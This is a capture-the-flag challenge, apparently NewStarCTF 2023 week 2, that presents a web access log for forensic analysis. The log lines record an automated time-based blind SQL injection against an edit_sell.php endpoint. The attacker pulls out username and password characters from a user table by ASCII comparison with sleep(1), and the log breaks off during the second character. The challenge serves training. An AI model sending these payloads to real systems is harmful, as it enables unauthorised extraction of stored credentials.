• NewStarCTF 2023 公开赛道 WEEK2|MISC1-序章

    题目

    1. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=40,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    2. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=41,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    3. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=42,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    4. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=43,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    5. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=44,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    6. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=45,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    7. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=46,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    8. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=47,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    9. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=48,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    10. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=49,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    11. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=50,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    12. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=51,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    13. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=52,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    14. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=53,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    15. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=54,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    16. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=55,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    17. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=56,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    18. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=57,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    19. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=58,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    20. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=59,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    21. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=60,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    22. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=61,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    23. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=62,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    24. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=63,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    25. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=64,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    26. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=65,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    27. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=66,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    28. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=67,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    29. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=68,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    30. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=69,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    31. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=70,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    32. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=71,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    33. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=72,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    34. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=73,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    35. 172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=74,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    36. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=75,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    37. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=76,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    38. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=77,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    39. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=78,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    40. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=79,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    41. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=80,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    42. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=81,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    43. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=82,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    44. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=83,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    45. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=84,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    46. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=85,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    47. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=86,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    48. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=87,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    49. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=88,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    50. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=89,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    51. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=90,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    52. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=91,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    53. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=92,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    54. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=93,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    55. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=94,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    56. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=95,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    57. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=96,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    58. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=97,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    59. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=98,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    60. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=99,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    61. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=100,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    62. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=101,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    63. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=102,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    64. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=103,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    65. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=104,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    66. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=105,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    67. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=106,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    68. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=107,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    69. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=108,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    70. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=109,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    71. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=110,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    72. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=111,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    73. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=112,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    74. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=113,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    75. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=114,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    76. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=115,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    77. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=116,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    78. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=117,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    79. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=118,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    80. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=119,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    81. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=120,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    82. 172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=121,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    83. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=40,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    84. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=41,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    85. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=42,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    86. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=43,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    87. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=44,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    88. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=45,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    89. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=46,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    90. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=47,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    91. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=48,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    92. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=49,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    93. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=50,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    94. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=51,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    95. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=52,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    96. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=53,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    97. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=54,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    98. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=55,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
    99. 172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=56,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
